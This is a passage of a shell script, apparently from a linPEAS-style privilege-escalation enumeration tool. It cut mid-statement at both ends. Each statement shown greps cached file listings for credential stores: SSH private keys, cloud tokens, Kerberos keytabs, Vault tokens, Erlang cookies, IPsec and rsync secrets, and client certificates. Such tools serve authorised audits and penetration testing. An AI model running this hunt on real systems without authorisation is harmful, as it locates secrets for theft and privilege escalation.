"$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E '/default/settings.php' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_MOODLE=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E 'moodle/config.php' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "config\.php$" | sort | uniq | head -n 70) + PSTORAGE_TOMCAT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E 
"^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) + PSTORAGE_MONGO=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) + PSTORAGE_SUPERVISORD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) + PSTORAGE_CESI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) + PSTORAGE_RSYNC=$(echo -e 
"$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) + PSTORAGE_HOSTAPD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_RACOON=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E 
"^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) + PSTORAGE_VNC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) + PSTORAGE_LDAP=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "ldap$" | sort | uniq | head -n 70) + PSTORAGE_OPENVPN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.ovpn$" | 
sort | uniq | head -n 70) + PSTORAGE_SSH=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) + PSTORAGE_CERTSB4=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) + PSTORAGE_CERTSBIN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) + PSTORAGE_CERTSCLIENT=$(echo -e 
"$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) + PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/private|^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) + PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/usr|^$GREPHOMESEARCH" | grep -E "ssh.*config$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E 
"^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) + PSTORAGE_KERBEROS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_KIBANA=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_KNOCKD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) + PSTORAGE_LOGSTASH=$(echo -e 
"$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "logstash$" | sort | uniq | head -n 70) + PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | 
grep -E "\.vault-token$" | sort | uniq | head -n 70) + PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "couchdb$" | sort | uniq | head -n 70) + PSTORAGE_REDIS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "redis\.conf$" | sort | uniq | head -n 70) + PSTORAGE_MOSQUITTO=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) + PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E 
"^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "neo4j$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_ERLANG=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) + PSTORAGE_GMV_AUTH=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IPSEC=$(echo -e 
"$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IRSSI=$(echo -e 